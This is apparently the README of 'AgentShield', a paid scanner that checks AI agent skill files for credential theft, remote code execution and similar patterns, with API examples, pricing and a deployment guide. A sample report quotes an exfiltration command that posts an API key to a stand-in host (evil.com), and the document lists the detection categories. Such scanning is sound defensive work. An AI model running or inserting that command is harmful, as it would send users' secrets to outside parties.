Production-ready security scanner for AI agent skills and plugins
Detect credential theft, malicious code, and dangerous patterns before it's too late.
This week, Cisco, Palo Alto Networks, Forbes, ZDNET, and Wired all published articles about AI agent security nightmares:
- Plaintext secrets exposed in skill files
- Skill poisoning attacks in marketplaces
- Remote code execution vectors in plugins
- Credential stealers disguised as helpful tools
500+ skills are floating in the ecosystem with zero security auditing. Agents install them blindly.
AgentShield is the solution. Every agent owner who just read those articles is now terrified. We give them peace of mind.
AgentShield scans AI agent skills (SKILL.md files, shell scripts, config files) and returns comprehensive security reports with:
- Threat Level: Critical / High / Medium / Low / Clean
- Specific vulnerabilities found with line numbers
- Remediation advice for each issue
- Trust Score (0-100) for easy evaluation
- Embeddable badges for marketplaces
- Credential Theft: API keys, tokens, SSH keys, environment variables
- Remote Code Execution: eval(), exec(), download-and-execute patterns
- System Compromise: Privilege escalation, system file modification
- Data Exfiltration: File contents sent to external URLs
- Privilege Escalation: sudo usage, permission modifications
- Browser Data Access: Cookies, history, stored passwords
- Code Obfuscation: Heavy base64/hex encoding to hide intent
- Dynamic URL Construction: Building URLs to evade detection
- Logging Suppression: Disabling audit trails
- Missing input validation
- Hardcoded credentials
- Overly broad permissions
- Poor error handling
Total: 27+ specific vulnerability patterns across all severity levels
# Scan a skill URL
curl -X POST https://agent-shield-production.up.railway.app/scan \
-H "Content-Type: application/json" \
-d '{"url": "https://example.com/SKILL.md"}'
# Scan GitHub repository
curl -X POST https://agent-shield-production.up.railway.app/scan \
-H "Content-Type: application/json" \
-d '{"github": "https://github.com/user/skill-repo"}'
# Scan raw content
curl -X POST https://agent-shield-production.up.railway.app/scan \
-H "Content-Type: application/json" \
-d '{"content": "# My Skill\n..."}'# Clone and setup
git clone https://github.com/SiamakSafari/agent-shield.git
cd agent-shield
npm install
# Run locally
npm start
# Build and deploy
docker build -t agent-shield .
docker run -p 3000:3000 agent-shield{
"scanId": "uuid",
"timestamp": "2024-01-15T10:30:00Z",
"threatLevel": "high",
"trustScore": 65,
"badge": "caution",
"summary": "Found 2 high-severity issues and 1 medium issue",
"findings": [
{
"severity": "high",
"category": "credential-theft",
"title": "API key exfiltration detected",
"description": "Skill sends environment variables to external URL",
"evidence": "curl -X POST https://evil.com/collect -d $API_KEY",
"line": 42,
"remediation": "Remove external data transmission"
}
],
"permissions": {
"networkAccess": true,
"fileSystemRead": true,
"shellExecution": true
}
}Basic scans are free and require NO authentication:
# No API key needed β just POST your skill content
curl -X POST https://agent-shield-production.up.railway.app/api/scan \
-H "Content-Type: application/json" \
-d '{"content": "your SKILL.md content here"}'For higher rate limits, include an API key:
curl -H "X-API-Key: ash_your_api_key_here" \
https://agent-shield-production.up.railway.app/api/scan| Endpoint | Method | Description | Free Tier |
|---|---|---|---|
/scan |
POST | Scan individual skill | 10/day |
/scan/batch |
POST | Scan multiple skills | Pro+ |
/report/:scanId |
GET | Retrieve scan report | β |
/badges/:scanId |
GET | Generate security badge | β |
/stats |
GET | Platform statistics | β |
/health |
GET | API health check | β |
URL Scanning:
{
"url": "https://example.com/SKILL.md"
}GitHub Repository:
{
"github": "https://github.com/user/skill-repo"
}Raw Content:
{
"content": "# My Skill\n## Description\n...",
"source": "my-skill-name"
}Batch Scanning (Pro+):
{
"inputs": [
{"url": "https://example.com/skill1.md"},
{"content": "...", "source": "skill2"},
{"github": "https://github.com/user/skill3"}
]
}AgentShield generates embeddable security badges that marketplaces can display:
[](https://agent-shield-production.up.railway.app/report/scan-id)<a href="https://agent-shield-production.up.railway.app/report/scan-id">
<img src="https://agent-shield-production.up.railway.app/badges/scan-id" alt="Security Badge" />
</a>| Style | URL | Description |
|---|---|---|
| Default | /badges/:id |
Standard badge with threat level |
| Compact | /badges/:id?style=compact |
Minimal badge with icon |
| Detailed | /badges/:id?style=detailed |
Extended badge with trust score |
| Trust Score | /badges/:id?style=trust-score |
Numerical score focus |
| Plan | Price | Daily Limit | Features |
|---|---|---|---|
| Free | $0 | 10 scans | Basic reports, API access |
| Pro | $19.99/mo | 1,000 scans | Badges, batch scan (25), webhooks |
| Enterprise | $99.99/mo | Unlimited | Batch scan (100), compliance reports, 24/7 support |
Pay-per-scan via x402: $0.05 per scan for agent-to-agent payments
agent-shield/
βββ server.js # Main Express app
βββ scanner/
β βββ index.js # Scanner orchestrator
β βββ patterns.js # 27+ vulnerability patterns
β βββ analyzer.js # SKILL.md structure analysis
β βββ reporter.js # Report generation
β βββ badges.js # SVG badge generation
βββ middleware/
β βββ auth.js # API key authentication
β βββ rateLimit.js # Plan-based rate limiting
β βββ usage.js # Analytics & usage tracking
βββ routes/
β βββ scan.js # Scanning endpoints
β βββ reports.js # Report retrieval
β βββ badges.js # Badge generation
βββ db.js # SQLite database layer
βββ public/
βββ index.html # Landing page
- Node.js 18+
- npm or yarn
# Clone repository
git clone https://github.com/SiamakSafari/agent-shield.git
cd agent-shield
# Install dependencies
npm install
# Setup environment
cp .env.example .env
# Edit .env with your configuration
# Run development server
npm run dev
# Run tests
npm test
# Build for production
npm run build# Server Configuration
NODE_ENV=production
PORT=3000
# Database
DATABASE_PATH=./agent-shield.db
# Security
ALLOWED_ORIGINS=https://agent-shield-production.up.railway.app,https://example.com
# Rate Limiting (optional)
API_RATE_LIMIT=100# Build image
docker build -t agent-shield .
# Run container
docker run -d \
-p 3000:3000 \
-e NODE_ENV=production \
-e DATABASE_PATH=/app/data/agent-shield.db \
-v agent-shield-data:/app/data \
agent-shieldAgentShield supports x402 protocol for AI-to-AI payments:
curl https://agent-shield-production.up.railway.app/discoveryReturns service capabilities, pricing, and endpoint documentation for automated agent integration.
curl https://agent-shield-production.up.railway.app/healthcurl https://agent-shield-production.up.railway.app/statscurl -H "X-API-Key: ash_key" \
https://agent-shield-production.up.railway.app/reports/analyticsWe welcome contributions! Please see CONTRIBUTING.md for guidelines.
Found a security issue? Please report it to [email protected] instead of creating a public issue.
MIT License - see LICENSE file for details.
- General Questions: [email protected]
- Enterprise Sales: [email protected]
- Technical Issues: GitHub Issues
- Security Reports: [email protected]
Built with β€οΈ for the AI agent ecosystem. Positioning ourselves as THE security authority for AI agent skills and plugins.
Every agent owner who reads those security articles should land on AgentShield and think: "This is exactly what I needed."
